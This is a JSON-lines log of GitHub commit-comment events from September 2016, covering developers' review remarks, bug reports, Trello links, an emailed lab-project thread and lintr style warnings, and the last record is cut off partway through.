{"id":"4580396019","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"tzipeergruppesued/tzipeergruppesued.github.io"},"payload":{"comment":{"id":19071690,"position":3,"line":2,"path":"_mitglieder/m-f.md","commit_id":"cd2224009666ed6d3a0ff1fe1235a9778ef77825","created_at":"2016-09-18T18:37:24Z","updated_at":"2016-09-18T18:37:24Z","body":"hier ist der titel @spruce-lee."}},"created_at":"2016-09-18T18:37:24Z"}
{"id":"4580396786","type":"CommitCommentEvent","actor":{"login":"drkibitz"},"repo":{"name":"pixijs/pixi.js"},"payload":{"comment":{"id":19071696,"position":29,"line":111,"path":"src/core/ticker/Ticker.js","commit_id":"77992755c9ba95c3aa04fddcf581e11ab6ff4602","created_at":"2016-09-18T18:37:55Z","updated_at":"2016-09-18T18:37:55Z","body":"See comment on _tick method. This makes that comment make zero sense."}},"created_at":"2016-09-18T18:37:55Z"}
{"id":"4580397136","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19071700,"position":null,"line":null,"path":null,"commit_id":"f4a8bd03404e1ab43458241d7292b4dfed1408a7","created_at":"2016-09-18T18:38:10Z","updated_at":"2016-09-18T18:38:10Z","body":"ah, ok my bad then ;-) sorry ;-)"}},"created_at":"2016-09-18T18:38:10Z"}
{"id":"4580398270","type":"CommitCommentEvent","actor":{"login":"asiekierka"},"repo":{"name":"MightyPirates/OpenComputers"},"payload":{"comment":{"id":19071712,"position":null,"line":null,"path":null,"commit_id":"884842b84378e9d15bb7d99c282e27b072434c4b","created_at":"2016-09-18T18:39:01Z","updated_at":"2016-09-18T18:39:01Z","body":"Wasn't it for screen borders? (Shouldn't that check for a screen border more precisely?)"}},"created_at":"2016-09-18T18:39:01Z"}
{"id":"4580398679","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19071717,"position":null,"line":null,"path":null,"commit_id":"faf5fffcb7a17dfdb3a00c771b6005fa1db4f496","created_at":"2016-09-18T18:39:19Z","updated_at":"2016-09-18T18:39:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8tH9Djg5&#x2F;10-entity-manipulation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Entity manipulation</a>"}},"created_at":"2016-09-18T18:39:19Z"}
{"id":"4580398903","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19071718,"position":null,"line":null,"path":null,"commit_id":"74190c8c4991d0a8b7172abe4a27fc9b733fa192","created_at":"2016-09-18T18:39:30Z","updated_at":"2016-09-18T18:39:30Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8tH9Djg5&#x2F;10-entity-manipulation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Entity manipulation</a>"}},"created_at":"2016-09-18T18:39:30Z"}
{"id":"4580400143","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19071724,"position":null,"line":null,"path":null,"commit_id":"9b1d18cf97f8497c5c90ce6fe3da0bc56a89b651","created_at":"2016-09-18T18:40:17Z","updated_at":"2016-09-18T18:40:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;VnoAFQ1q&#x2F;19-save-system\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Save System</a>"}},"created_at":"2016-09-18T18:40:17Z"}
{"id":"4580401074","type":"CommitCommentEvent","actor":{"login":"oderman"},"repo":{"name":"oderman/holamundo"},"payload":{"comment":{"id":19071728,"position":null,"line":null,"path":null,"commit_id":"7e029da776d8d127d11b3588d6f09e3a2fd1030a","created_at":"2016-09-18T18:40:55Z","updated_at":"2016-09-18T18:40:55Z","body":"titulo"}},"created_at":"2016-09-18T18:40:55Z"}
{"id":"4580403011","type":"CommitCommentEvent","actor":{"login":"mauser"},"repo":{"name":"hydrogen-music/hydrogen"},"payload":{"comment":{"id":19071736,"position":null,"line":null,"path":null,"commit_id":"6259a9e9d95f570366c1c27da101fa8697e878f1","created_at":"2016-09-18T18:42:16Z","updated_at":"2016-09-18T18:42:16Z","body":"Can you try to add RAPTOR2 to the statuslist? Just guessing.. i'm surprised that `-l/usr/include/raptor2` disappears after adding RAPTOR to the statuslist. "}},"created_at":"2016-09-18T18:42:16Z"}
{"id":"4580406222","type":"CommitCommentEvent","actor":{"login":"soeiner"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19071748,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-18T18:44:33Z","updated_at":"2016-09-18T18:44:33Z","body":"Integer"}},"created_at":"2016-09-18T18:44:33Z"}
{"id":"4580406789","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071752,"position":59,"line":194,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:44:59Z","updated_at":"2016-09-18T18:44:59Z","body":"@aunpyz กุลืมลบคอมเม้นวะ"}},"created_at":"2016-09-18T18:44:59Z"}
{"id":"4580408411","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071758,"position":38,"line":151,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:46:05Z","updated_at":"2016-09-18T18:46:05Z","body":"@aunpyz กุแก้เป็น node2 ไม่งั้นบัควนลูป"}},"created_at":"2016-09-18T18:46:05Z"}
{"id":"4580409029","type":"CommitCommentEvent","actor":{"login":"SirLovi"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19071759,"position":null,"line":null,"path":null,"commit_id":"f1dc56067c3f4f59429006e48db5e9aed414b318","created_at":"2016-09-18T18:46:29Z","updated_at":"2016-09-18T18:46:29Z","body":"By this logic it spawns upgraders only after having storage. But doesn't print errors like it does without `!spawn.room.storage ||`\r\nThe problem is with `spawn.room.storage.store.energy` after the `return`\r\nSee:\r\n\r\n```\r\ncreep.setup.upgrader:20\r\n    return 1 + Math.floor(spawn.room.storage.store.energy / MAX_STORAGE_ENERGY);\r\n                                            ^\r\nTypeError: Cannot read property 'store' of undefined\r\n    at setup.maxCount (creep.setup.upgrader:20:45)\r\n    at isValidSetup (creep.Setup:77:29)\r\n    at setup (spawn:18:30)\r\n    at baseFindIndex (/opt/engine/node_modules/lodash/index.js:326:11)\r\n    at Function.<anonymous> (/opt/engine/node_modules/lodash/index.js:3241:23)\r\n    at Spawn.loop (spawn:20:15)\r\n    at spawn (spawn:37:27)\r\n    at baseForOwn (/opt/engine/node_modules/lodash/index.js:2046:14)\r\n```\r\n\r\nCan you help me a bit with this logic puzzle? :smile: "}},"created_at":"2016-09-18T18:46:29Z"}
{"id":"4580410279","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071764,"position":58,"line":193,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:47:21Z","updated_at":"2016-09-18T18:47:21Z","body":"@aunpyz -1 เพราะ ใช้หลักหา max แต่เอาตัวน้อยสุดตั้ง"}},"created_at":"2016-09-18T18:47:21Z"}
{"id":"4580411826","type":"CommitCommentEvent","actor":{"login":"NachiketNamjoshi"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19071773,"position":4,"line":407,"path":"net/bluetooth/hci_conn.c","commit_id":"336e979af999c60f24148b8c611f8211e766c422","created_at":"2016-09-18T18:48:27Z","updated_at":"2016-09-18T18:48:27Z","body":"wut happen m8 ?\r\n"}},"created_at":"2016-09-18T18:48:27Z"}
{"id":"4580411919","type":"CommitCommentEvent","actor":{"login":"Lineflyer"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19071774,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-18T18:48:32Z","updated_at":"2016-09-18T18:48:32Z","body":"The downside of this change is, that with gc.com and oc.de both active I always get 20 of gc.com and 100 of oc.de. As the oc cache density if much lower mapping the search result will result in a map with radius 200km (worst case) where the gc.com caches are only found as a clunch somewhere in the center."}},"created_at":"2016-09-18T18:48:32Z"}
{"id":"4580412036","type":"CommitCommentEvent","actor":{"login":"ChristyanS"},"repo":{"name":"ChristyanS/Programa-oModular"},"payload":{"comment":{"id":19071775,"position":null,"line":null,"path":null,"commit_id":"0181515db02eb076ed3eb086ed75df87496b88ac","created_at":"2016-09-18T18:48:36Z","updated_at":"2016-09-18T18:48:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;lMYyPHhu&#x2F;1-sdada\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> sdada</a>"}},"created_at":"2016-09-18T18:48:36Z"}
{"id":"4580412652","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"saidinesh5/android_kernel_xiaomi_cancro"},"payload":{"comment":{"id":19071777,"position":null,"line":null,"path":null,"commit_id":"feccb4886bc8db2a587dc5ddbec9a88dbf7b55c6","created_at":"2016-09-18T18:49:03Z","updated_at":"2016-09-18T18:49:03Z","body":"thx for keeping any authorships"}},"created_at":"2016-09-18T18:49:03Z"}
{"id":"4580412865","type":"CommitCommentEvent","actor":{"login":"traumaticwave"},"repo":{"name":"traumaticwave/Undergraduate-Data-Structure"},"payload":{"comment":{"id":19071779,"position":null,"line":null,"path":null,"commit_id":"76bc1f9ca8f2d3ae31cfd56aba94e502f4504757","created_at":"2016-09-18T18:49:12Z","updated_at":"2016-09-18T18:49:12Z","body":"aaa"}},"created_at":"2016-09-18T18:49:12Z"}
{"id":"4580413252","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19071781,"position":null,"line":null,"path":null,"commit_id":"3923a7678ead43ba9825dff49b1f106bc6197e31","created_at":"2016-09-18T18:49:28Z","updated_at":"2016-09-18T18:49:28Z","body":"My facebook link \r\nHTTPS://WWW.FACEBOOK.com/unofficial-The Book- of-Life-1653207928326"}},"created_at":"2016-09-18T18:49:28Z"}
{"id":"4580413812","type":"CommitCommentEvent","actor":{"login":"ChristyanS"},"repo":{"name":"ChristyanS/Driaths"},"payload":{"comment":{"id":19071783,"position":null,"line":null,"path":null,"commit_id":"7eb0fd09af77d0ecdbd32d4e925ce09c5922ac52","created_at":"2016-09-18T18:49:52Z","updated_at":"2016-09-18T18:49:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;lMYyPHhu&#x2F;1-sdada\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> sdada</a>"}},"created_at":"2016-09-18T18:49:52Z"}
{"id":"4580413895","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19071784,"position":null,"line":null,"path":null,"commit_id":"3923a7678ead43ba9825dff49b1f106bc6197e31","created_at":"2016-09-18T18:49:56Z","updated_at":"2016-09-18T18:49:56Z","body":"316/"}},"created_at":"2016-09-18T18:49:56Z"}
{"id":"4580413943","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19071785,"position":null,"line":null,"path":null,"commit_id":"f63ba9f1873f55120696d9a1f9d203f9618daae6","created_at":"2016-09-18T18:49:58Z","updated_at":"2016-09-18T18:49:58Z","body":"@toby-1-kenobi  thank you!! you saved me after 20 min of debugging.\r\n\r\nFor anyone having problem with this line\r\nShareActionProvider mShareActionProvider = (ShareActionProvider)MenuItemCompat.getActionProvider(menuItem);\r\n\r\nmake sure you EXACTLY have this line in your imports\r\nimport android.support.v7.widget.ShareActionProvider;\r\n\r\nI accidently imported android.support.widget.shareactionprovider when it gave me the auto-import option and this kept giving me errors with menuitemcompat."}},"created_at":"2016-09-18T18:49:58Z"}
{"id":"4580414614","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19071788,"position":22,"line":162,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-18T18:50:25Z","updated_at":"2016-09-18T18:50:25Z","body":"Kindly go through the issue once again. This code is correct; however, it missed following part:\r\n\"put a random integer between 50 and 200 for entries that don't have place ID\""}},"created_at":"2016-09-18T18:50:25Z"}
{"id":"4580415116","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19071790,"position":null,"line":null,"path":null,"commit_id":"a39e7b54677371723b78be388630ce08fe08bba5","created_at":"2016-09-18T18:50:47Z","updated_at":"2016-09-18T18:50:47Z","body":"The `packages_apps_Telephony` repo is broken, this fixes nothing 😒 "}},"created_at":"2016-09-18T18:50:47Z"}
{"id":"4580419579","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19071806,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T18:53:50Z","updated_at":"2016-09-18T18:53:50Z","body":"I've started working with reading in the board file and filling the array,\nabout half success now. Once the board array is filled we can start working\non the rest. Not sure if we want to make a nother text file for the client\nto keep track of the board since the client is re-invoked each time. Can't\nreally use an array since the program is restarted each time but writing to\na file from an array could be a pain. I will finish the server side\ncreating the board array first, might use a list within a list.\nWhat do you guys want to work on or feel comfortable about working on?\n\nDavid\n\nOn Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> Just checked, the address for localhost is correct, the port numbers and\n> ip being set from command line arguments is already implemented and I\n> checked the connection already. I was going to play around with different\n> ways of making the board and http stuff next. I put a board.txt file in the\n> folder too to use to test reading the file and creating an array or list of\n> lists for the board.\n> Remember to git pull before working on anything to make sure you have the\n> most recent version.\n> I will be working on it some tonight and spending most the day on it\n> tomorrow.\n>\n> On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> Right now the server is on 127.0.0.1( i may have the address wrong but it\n>> should be the address of localhost, which is the same no matter what\n>> machine it is running on) just to run it on your local machine to test, it\n>> will be changed to the ip address of the machine it is running on when they\n>> grade it.\n>>\n>> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com>\n>> wrote:\n>>\n>>> It is getting the fire commands from the command line arguments, that is\n>>> why the client is being invoked every play. The connection is made with the\n>>> port number and IP address passed in from the command line arguments. I\n>>> have already wrote the code for the connection using the socket library.\n>>> Thev ariables for the x and y coords passed from the command line are\n>>> working just as you had them in your test.py, I added it to the client.py\n>>> file already. These variable will be used in the methods that send the http\n>>> message. The http and passing in the variable I think will be the easy\n>>> part, some of it is done and it works. The time consuming part is going to\n>>> be writing the code to maintain the board and \"serving\" the display of the\n>>> board.\n>>> Tracking sunk ships will work as you suggested and this will be put in a\n>>> method called from read_board or process_reply or done inside of\n>>> process_reply.\n>>>\n>>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n>>> notifications@github.com> wrote:\n>>>\n>>>> I was thinking about tracking sunk ships. Just a thought, but what if\n>>>> we had a global variable for each ship (carrier = 5), and every time we hit\n>>>> that type of ship we decrement that value, and compare it to 0. so if\n>>>> carrier gets to 0 then it has been hit 5 times which is the same thing as\n>>>> being sunk.\n>>>>\n>>>> —\n>>>> You are receiving this because you authored the thread.\n>>>> Reply to this email directly, view it on GitHub\n>>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>>>> or mute the thread\n>>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>>>> .\n>>>>\n>>>\n>>>\n>>\n>\n"}},"created_at":"2016-09-18T18:53:50Z"}
{"id":"4580420321","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071810,"position":56,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:54:17Z","updated_at":"2016-09-18T18:54:17Z","body":"@aunpyz ผิดตรงนี้"}},"created_at":"2016-09-18T18:54:17Z"}
{"id":"4580420743","type":"CommitCommentEvent","actor":{"login":"brentvatne"},"repo":{"name":"exponentjs/ex-navigation"},"payload":{"comment":{"id":19071814,"position":null,"line":null,"path":null,"commit_id":"ba3140429dcb86a81a08e45d421919b5bdccb043","created_at":"2016-09-18T18:54:35Z","updated_at":"2016-09-18T18:54:35Z","body":"yup @hhravn!"}},"created_at":"2016-09-18T18:54:35Z"}
{"id":"4580421939","type":"CommitCommentEvent","actor":{"login":"aunpyz"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071818,"position":38,"line":151,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:55:29Z","updated_at":"2016-09-18T18:55:29Z","body":"กุคงงงๆ อ่านโจทย์ผิดมั้ง"}},"created_at":"2016-09-18T18:55:29Z"}
{"id":"4580422036","type":"CommitCommentEvent","actor":{"login":"vermiculus"},"repo":{"name":"vermiculus/magithub"},"payload":{"comment":{"id":19071819,"position":null,"line":null,"path":null,"commit_id":"67f950f47b7029f40d2a0dd00c7690a7920dbbc7","created_at":"2016-09-18T18:55:33Z","updated_at":"2016-09-18T18:55:33Z","body":"Oops! I meant to say `H`. See #10."}},"created_at":"2016-09-18T18:55:33Z"}
{"id":"4580422896","type":"CommitCommentEvent","actor":{"login":"jamesevickery"},"repo":{"name":"jamesevickery/l293d"},"payload":{"comment":{"id":19071820,"position":null,"line":null,"path":null,"commit_id":"98fc095c6db70bd3c83f868077e2f6627886cef0","created_at":"2016-09-18T18:56:06Z","updated_at":"2016-09-18T18:56:06Z","body":"I also fixed `cleanup`, but need to add another `if verbose:`"}},"created_at":"2016-09-18T18:56:06Z"}
{"id":"4580423204","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071824,"position":56,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:56:17Z","updated_at":"2016-09-18T18:56:17Z","body":"ข้ามสมาชิกตัวแรก"}},"created_at":"2016-09-18T18:56:17Z"}
{"id":"4580423236","type":"CommitCommentEvent","actor":{"login":"aunpyz"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071825,"position":56,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T18:56:19Z","updated_at":"2016-09-18T18:56:19Z","body":"กุย้ายtmpไปไว้หลังheadแล้ว แล้วใช้headเป็นmaxปัจจุบัน\r\nมันมีส่วนไหนที่ไม่ถูกวะ"}},"created_at":"2016-09-18T18:56:19Z"}
{"id":"4580424819","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19071832,"position":null,"line":null,"path":null,"commit_id":"a39e7b54677371723b78be388630ce08fe08bba5","created_at":"2016-09-18T18:57:22Z","updated_at":"2016-09-18T18:57:22Z","body":"@MSF-Jarvis previously, it tried to pull apps_telephony from us. We do not have apps. We only have services. This does fix it as it now pulls the services repo from us, and the services repo exists on our git."}},"created_at":"2016-09-18T18:57:22Z"}
{"id":"4580425962","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071835,"position":14,"line":14,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T18:58:04Z","updated_at":"2016-09-18T18:58:04Z","body":"没有在method之间公用的最好定义为local变量。"}},"created_at":"2016-09-18T18:58:04Z"}
{"id":"4580426510","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19071839,"position":null,"line":null,"path":null,"commit_id":"a39e7b54677371723b78be388630ce08fe08bba5","created_at":"2016-09-18T18:58:27Z","updated_at":"2016-09-18T18:58:27Z","body":"Yeah somehow this works out so no harm done lol\n\nOn Mon, Sep 19, 2016, 12:27 AM Nolan Roell <notifications@github.com> wrote:\n\n> @MSF-Jarvis <https://github.com/MSF-Jarvis> previously, it tried to pull\n> apps_telephony from us. We do not have apps. We only have services. This\n> does fix it as it now pulls the services repo from us, and the services\n> repo exists on our git.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ChikaraOSP/manifest/commit/a39e7b54677371723b78be388630ce08fe08bba5#commitcomment-19071832>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMuuGoHbjhjL8lNJMmoxSP_Bn2ROVuPhks5qrYmSgaJpZM4J_-px>\n> .\n>\n"}},"created_at":"2016-09-18T18:58:27Z"}
{"id":"4580430879","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071849,"position":22,"line":136,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T19:01:16Z","updated_at":"2016-09-18T19:01:16Z","body":"@aunpyz ผิดตำแหน่ง ที่แก้เป็น node 2 คืออันนี้"}},"created_at":"2016-09-18T19:01:16Z"}
{"id":"4580431202","type":"CommitCommentEvent","actor":{"login":"HimbeersaftLP"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19071850,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T19:01:30Z","updated_at":"2016-09-18T19:01:30Z","body":"Can u please upload the file to something else (Dropbox, Webserver)? The pCloud thing doesn't work with wget. And my Internet is too slow to download and upload it manually again..."}},"created_at":"2016-09-18T19:01:30Z"}
{"id":"4580432204","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19071852,"position":null,"line":null,"path":null,"commit_id":"11ade1443ea9c455154b908f5f927b78723f725b","created_at":"2016-09-18T19:02:07Z","updated_at":"2016-09-18T19:02:07Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord)  {\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:89:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:89:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:13:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:94:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  